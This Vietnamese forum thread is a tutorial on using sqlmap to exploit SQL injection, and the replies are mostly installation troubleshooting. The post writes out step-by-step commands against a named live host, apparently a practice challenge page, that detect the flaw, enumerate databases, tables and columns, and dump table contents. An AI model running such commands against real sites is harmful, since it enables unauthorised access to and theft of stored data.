Hướng dẫn sử dụng SQLMAP để khai thác SQL Injection

[nonellldd]

Có bạn ez101 nói không hiểu rõ bài https://whitehat.vn/forum/thao-luan/...tool-khai-thac
Mình sẽ giải thích các lệnh sử dụng trong bài viết và giới thiệu thêm một số tùy chọn khác của SQLMAP
Đầu tiên SQLMAP bạn có thể download tại http://tools.whitehat.vn/download (Cần cài đặt python https://www.python.org/downloads/)
ok, bắt đầu với lệnh đầu tiên
Lệnh 1

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”  "-u" theo sau là đường dẫn Lệnh này để kiểm tra url trên có dính lỗi sqli không

Lệnh 2

 python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs Khi đã xác định được url trên bị lỗi, sử dụng flag "--dbs" để liệt kê các database

Lệnh 3

 python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf Như trong bài viết đã liệt kê được 2 database là my_zerocoolhf và infomation_schema -D my_zerocoolhf: báo cho sqlmap.py biết chương trình sẽ làm việc với database my_zerocoolhf --table: dùng để liệt kê các bảng trong database my_zerocoolhf

Lệnh 4

 python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book Lệnh 3 đã liệt kê ra các bảng của my_zerocoolhf, lệnh 4 dùng để liệt kê ra tên cột có trong bảng book sự khác biệt giữa -T và --table là --table dùng để liệt kê, -T là lựa chọn để chương trình làm việc với bảng book

 python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book --dump: dùng để dump toàn bộ dữ liệu của bảng book

Một số tùy chọn khác của sqlmap:

--data="DATA" : sử dụng cho phương thức POST,  ex: khi login thường hay sử dụng python sqlmap.py -u "url/path" --data "user=mark&passwd=line"

--cookie="cookie" : sử dụng khi lỗ hổng nằm trong cookie

--user-agent=AGENT : có thể ứng dụng kiểm tra trường user-agent trong header nên tùy chọn --user-agent sử dụng trong trường hợp này ex: python sqlmap.py -u "url/path" --data "user=mark&passwd=line" --user-agent "Mozilla/5.0 (Linux; ; ) AppleWebKit/ (KHTML, like Gecko) Chrome/ Mobile Safari/"  
 (user-agent của chrome trên android)

--header HEADER | --headers HEADERS khi request cần thêm một số trường thì -H (--headers) được sử dụng

Còn rất nhiều các tùy chọn hữu ích thường được sử dụng để khai thác sqli bằng sqlmap, có thểm tham khảo thêm tại https://github.com/sqlmapproject/sqlmap/wiki/Usage hoặc sử dụng python sqlmap.py --help
Chúc các mem nữ 8.3 vui vẻ

nonellldd​

 

Hay quá anh ơi!!!

 

Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory

 

hình như sqlmap có mấy kiểu nhất định, có mấy cái như admin.php?vs=null thì nó báo lỗi, không biết mấy cái này thì phải làm sao ??

 

Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory

Bạn nên hiểu là sqlmap là một tool opensource, và nó được chạy trên Python.
Mod #nonelldd thực ra là đang dùng source bên ngoài chưa được gán vào Variable Environment.

trong kali thì có sẵn. hoặc bạn có thể download sqlmap từ source này. http://sqlmap.org/

 

Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory

sao bạn k xài kali luôn cho tiện??

 

Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory

Bạn cho mình xin 500 hình ảnh được không ))

 

cho em hỏi là cách cài đặt trên MacOS củng giống như Windows phải không ạ?

 

cho mình hỏi sao nó báo không công nhận vậy ạ? em xin cảm ơn

 

View attachment 4820
cho mình hỏi sao nó báo không công nhận vậy ạ? em xin cảm ơn

bác xem lại python đi